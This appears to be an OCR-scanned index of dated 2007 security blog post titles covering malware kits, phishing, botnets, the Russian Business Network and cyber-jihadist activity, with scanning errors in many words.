06-20 13:27 ) 

■ MANPADS and Terrorism ( 2007-06-21 00:56 ) 

■ A List of Terrorists' Blo as ( 2007-06-21 15:20 ) 

■ A Blacklist of Chinese Spammers (2007-06-22 
14:15 ) 

■ The MPack Kit Attack on Video ( 2007-06-22 
15:19 ) 

■ Cell Phone Stalkin g ( 2007-06-25 14:54 ) 

■ Security Comic Strips (2007-06-25 15:40 ) 

■ Early Warnin g Security Event Systems ( 2007-06- 
26 20:16 ) 

■ Exploits Servin g Domains (2007-06-27 11:48 ) 

■ Post a Crime Online (2007-06-28 14:01 ) 

■ Exploits Servin g Domains - Part Two (2007-06-29 
16:05 ) 

uly. 

■ Mu j ahideen Harvest Ma g azine - Issue 41 ( 2007- 
07-04 13:47 ) 

■ Hackin g the iPhone (2007-07-05 15:35 ) 

■ Zero Dav Vulnerabilities Auction ( 2007-07-06 
13:43 ) 

■ Terrorist Groups' Brand Identities (2007-07-09 
16:02 ) 

■ The Extremist Threat from Metallica ( 2007-07-09 
16:24 ) 

■ E-commerce and Privac y ( 2007-07-11 14:58 ) 

■ Insecure Bureaucracy in German y ( 2007-07-11 
15:49 ) 

■ Tar g eted Extortion Attacks at Celebrities ( 2007- 
07-17 15:28 ) 

■ Bluetooth Movement Trackin g ( 2007-07-18 
11:45 ) 

■ A Multi Feature Malware Cr v oter (2007-07-18 
14:57 ) 








































































■ SO L In j ection Throu g h Search En g ines 
Reconnaissance ( 2007-07-19 14:58 ) 

■ Malware Embedded Sites Increasin g ( 2007-07- 
25 17:26 ) 

■ Confirm Your Gullibilit y ( 2007-07-26 11:43 ) 

■ C vber l ihadists 1 and TOR (2007-07-26 20:08 ) 

■ More Malware Cr v oters for Sale (2007-07-26 
20:29 ) 

■ Delicious Information Warfare . Saturda y. 28th 
( 2007-07-28 12:30 ) 

■ Shark2 - RAT or Malware? (2007-07-28 20:57 ) 

■ The IcePack Malware Kit in Action (2007-07-30 
01:06 ) 

■ World of Warcraft Domain Scam (2007-07-30 
13:04 ) 

■ GIMF Switchin g Blo as ( 2007-07-31 12:10 ) 

■ Feedin g Packed Malware Binaries (2007-07-31 
14:11 ) 

■ Avera g e Online Time for Phishin g Sites (2007- 
07-31 21:28 ) 

August 

■ GIMF Now Permanently Shut Down (2007-08-03 
13:29 ) 

■ Delicious Information Warfare . Frida y. 3rd (2007- 
08-03 14:48 ) 

■ A Commercial Click Fraud Tool (2007-08-08 
16:35 ) 

■ A Cvber l ihadist DoS Tool ( 2007-08-08 21:25 ) 

■ The Storm Worm Malware Back in the Game 

( 2007-08-09 15:24 ) 

■ DIY Phishin g Kits (2007-08-13 13:30 ) 

■ Pharmin g Attacks Throu g h DNS Cache Poisonin g 
( 2007-08-13 16:58 ) 

■ The Shark 2 DIY Malware ( 2007-08-16 12:27 ) 

■ Pa yPal's Security Ke v ( 2007-08-16 16:31 ) 












































































■ 534 Bio gra phies of l ihadist Fi g hters (2007-08-16 
20:49 ) 

■ Analyses of Cyber l ihadist Forums and Blo as 
( 2007-08-17 01:17 ) 

■ RATs or Malware? (2007-08-20 14:36 ) 

■ Offensive Storm Worm Obfuscation (2007-08-21 
12:54 ) 

■ Excuse Us for Our Insecurities (2007-08-22 
14:01 ) 

■ The Nuclear Malware Kit (2007-08-22 14:11 ) 

■ GIMF - "We Will Remain" (2007-08-24 12:16 ) 

■ Distributed WiFi Scannin g Throu g h Malware 
( 2007-08-24 12:42 ) 

■ DIY Pharmin a Tools (2007-08-25 23:47 ) 

■ Your Point of View - Requested! ( 2007-08-26 
21:06 ) 

■ The Economics of Phishin g ( 2007-08-28 12:42 ) 

■ DIY Phishin g Kits (2007-08-29 15:21 ) 

■ Storm Worm's use of Dro o ped Domains (2007- 
08-29 17:05 ) 

■ Massive Online Games Malware Attack (2007- 
08-30 13:55 ) 

■ Malware as a Web Service ( 2007-08-31 00:35 ) 

■ Bank of India Servin g Malware ( 2007-08-31 
12:03 ) 

September 

■ S pammers and Phishers Breakin g CAPTCHAs 
( 2007-09-03 12:25 ) 

■ DIY Exploits Embeddin g Tools - a Retrospective 
( 2007-09-04 12:27 ) 

■ Lo g in Details for Forei g n Embassies in the Wild 
( 2007-09-04 23:49 ) 

■ Storm Worm's Fast Flux Networks ( 2007-09-05 
14:18 ) 

■ Examples of Search En g ine Soam ( 2007-09-05 
15:56 ) 












































































■ Infectin g Terrorist Suspects with Malware (2007- 
09-06 16:58 ) 

■ Popular Web Malware Exploitation Techniques 
( 2007-09-10 14:30 ) 

■ Goo a le Hackin g for MPacks . Zunkers and 
WebAttackers ( 2007-09-10 15:49 ) 

■ Storm Worm's DDoS Attitude (2007-09-11 
16:10 ) 

■ 209 Host Locked ( 2007-09-12 13:37 ) 

■ U.S Consulate St. Petersbur g Servin g Malware 
( 2007-09-14 17:08 ) 

■ Storm Worm's DDoS Attitude - Part Two (2007- 
09-17 11:26 ) 

■ PayPal and Ebav Phishin g Domains ( 2007-09-17 
14:10 ) 

■ A Chinese Malware Downloader in the Wild 

( 2007-09-17 18:11 ) 

■ Two Cvber l ihadist Blo g s Now Offline ( 2007-09- 
19 14:33 ) 

■ Custom DDoS Capabilities Within a Malware 
( 2007-09-19 16:02 ) 

■ DIY Phishin g Kit Goes 2.0 ( 2007-09-20 12:57 ) 

■ The Truth Serum - Have a Drink! (2007-09-21 
15:50 ) 

■ The Dark Web and Cvber l ihad ( 2007-09-24 
13:56 ) 

■ Localizin g O pen Source Malware (2007-09-26 
09:21 ) 

■ China's Cvber Espiona g e Ambitions ( 2007-09-26 
09:42 ) 

■ A New Issue of ( IN) Secure Ma g azine "in the 
Wild" ( 2007-09-26 11:00 ) 

■ S yrian Embassy in London Servin g Malware 
( 2007-09-27 19:25 ) 

■ S yrian Embassy in London Servin g Malware 
( 2007-09-28 20:33 ) 
















































































■ A New DDoS Malware Kit in the Wild (2007-09- 

29 16:44 ) 

■ DIY Chinese Passwords Stealer (2007-09-29 
19:14 ) 

■ Zero Dav Vulnerabilities Market Model Gone 
Wron g ( 2007-09-30 12:20 ) 

■ Don't Plav Poker on an Infected Table (2007-09- 

30 18:58 ) 

October 

■ Love is a Psychedelic Too ( 2007-10-01 12:49 ) 

■ The Dynamics of the Malware Industr y - 
Proprietary Malware Tools ( 2007-10-02 12:06 ) 

■ CISRT Servin g Malware ( 2007-10-03 14:20 ) 

■ DIY CAPTCHA Breakin g Service ( 2007-10-03 
17:53 ) 

■ People's Information Warfare Concept ( 2007-10- 
05 11:27 ) 

■ Assessin g a Rock Phish Campai gn ( 2007-10-08 
15:12 ) 

■ Incentives Model for Pharmaceutical Scams 

( 2007-10-10 13:17 ) 

■ Compromised Sites Servin g Malware and Soam 
( 2007-10-10 15:28 ) 

■ Fast-Flux Soam and Scams Increasin g ( 2007-10- 
11 17:34 ) 

■ Does This Blo g S peak for Itself? (2007-10-11 
20:33 ) 

■ A l ournev to the Heart of Internet Censorshi p 
( 2007-10-11 23:54 ) 

■ Mana g ed Spammin g Ap pliances - The Future of 
S oam ( 2007-10-13 16:08 ) 

■ The Global Security Challen g e - 2007 ( 2007-10- 
15 23:27 ) 

■ DIY German Malware Dro p per ( 2007-10-16 
15:58 ) 










































































■ Fast Fluxin g Yet Another Pharmacy Scam ( 2007- 
10-16 21:16 ) 

■ MPack and IcePack Localized to Chinese ( 2007- 
10-16 23:31 ) 

■ Thousands of IM Screen Names in the Wild 

( 2007-10-17 15:56 ) 

■ The Russian Business Network ( 2007-10-18 
18:22 ) 

■ Everyone's Guide to Bv-Passin a Internet 
Censorshi p ( 2007-10-19 13:58 ) 

■ eCrime Researchers Summit 2007 - Papers 
Available (2007-10-19 15:09 ) 

■ Random Flickr l ewel - Hold it Ri g ht There! ( 2007- 
10-20 22:41 ) 

■ China's Cvber Warriors - Video ( 2007-10-21 
21:17 ) 

■ Empowerin g the Script Kiddies ( 2007-10-22 
23:09 ) 

■ Introducin g lia lu - Ta g s That Think (2007-10-23 
02:59 ) 

■ Ain't That U glv? ( 2007-10-23 03:52 ) 

■ RBN's Fake Security Software ( 2007-10-23 
14:36 ) 

■ Over 100 Malwares Hosted on a Sin g le RBN IP 
( 2007-10-23 23:45 ) 

■ A Portfolio of Malware Embedded Ma g azines 
( 2007-10-25 13:18 ) 

■ Multiple Firewalls B y passin g Verification on 
Demand ( 2007-10-29 13:46 ) 

■ Wisdom of the Anti Cvber l ihadist Crowd ( 2007- 
10-29 18:36 ) 

■ Possibility Media's Malware Fiasco ( 2007-10-30 
14:22 ) 

■ Botnet on Demand Service ( 2007-10-31 00:45 ) 
November 











































































■ Yahoo Messen g er Controlled Malware (2007-11- 
02 13:16 ) 

■ Metaohisher Malware Kit Spotted in the Wild 
( 2007-11-02 15:46 ) 

■ Detectin g and Blockin g the Russian Business 
Network (2007-11-03 20:32 ) 

■ Mana g ed Fast-Flux Provider ( 2007-11-03 20:59 ) 

■ Rebrandin g a Security Vendor ( 2007-11-05 
03:39 ) 

■ Overoerformin o Turkish Hacktivists ( 2007-11-05 
09:41 ) 

■ I See Alive IFRAMEs Everywhere ( 2007-11-06 
20:26 ) 

■ Electronic l ihad v3.0 - What Cvber l ihad Isn't 
( 2007-11-07 14:38 ) 

■ Go to Slee p. Go to Sleep mv Little RBN (2007- 
11-08 16:59 ) 

■ Yet Another Malware Outbreak Monitor ( 2007- 
11-09 15:28 ) 

■ Tar g eted Spammin g of Bankers Malware ( 2007- 
11-12 13:22 ) 

■ pQrn. g ov - The On g oin g Blackhat SEP Operation 
( 2007-11-12 16:32 ) 

■ Teachin g C vber l ihadists How to Hack ( 2007-11- 
12 20:57 ) 

■ Scammv Ecosystem (2007-11-14 16:27 ) 

■ Electronic l ihad's Tar g ets List ( 2007-11-14 
17:24 ) 

■ Popular Spammers Strate g ies and Tactics (2007- 
11-14 18:54 ) 

■ C vber l ihadist Blo g s Switchin g Locations A g ain 
( 2007-11-15 21:05 ) 

■ First Person Shooter Anti-Malware Game (2007- 
11-15 22:35 ) 

■ Lonely Polina's Secret ( 2007-11-16 16:13 ) 






















































































■ But of Course I'm Infected With S p yware ( 2007- 
11-18 18:30 ) 

■ The "New Media" Malware Gan g ( 2007-11-18 
23:49 ) 

■ Another Massive Embedded Malware Attack 

( 2007-11-19 22:47 ) 

■ Lar g e Scale M vS oace Phishin g Attack ( 2007-11- 
20 05:42 ) 

■ Mass Defacement bv Turkish Hacktivists (2007- 
11-21 19:44 ) 

■ A Botnet of Infected Terrorists? (2007-11-21 
22:33 ) 

■ The State of T v posq uattin g - 2007 ( 2007-11-23 
16:10 ) 

■ Exposin g the Russian Business Network ( 2007- 
11-26 11:52 ) 

■ But Malware is Prone to be Profitable ( 2007-11- 
26 19:33 ) 

■ I See Alive IFRAMEs Everywhere - Part Two 
( 2007-11-27 22:40 ) 

■ Are You Botnet-in o With Me? (2007-11-27 22:48 ) 

■ A TrustedSource for Threats Intel I Data (2007- 
11-27 22:52 ) 

■ Which CAPTCHA Do You Want to Decode Toda y? 

( 2007-11-28 23:12 ) 

■ 66.1 Host Locked (2007-11-28 23:39 ) 

■ Malware Servin g Online Casinos (2007-11-30 
00:04 ) 

December 

■ Censorin g Web 2.0 - The Access Denied Ma p 
( 2007-12-03 17:23 ) 

■ MDAC ActiveX Code Execution Exploit Still in the 
Wild (2007-12-05 18:50 ) 

■ A Diverse Portfolio of Fake Security Software 
( 2007-12-07 22:46 ) 

































































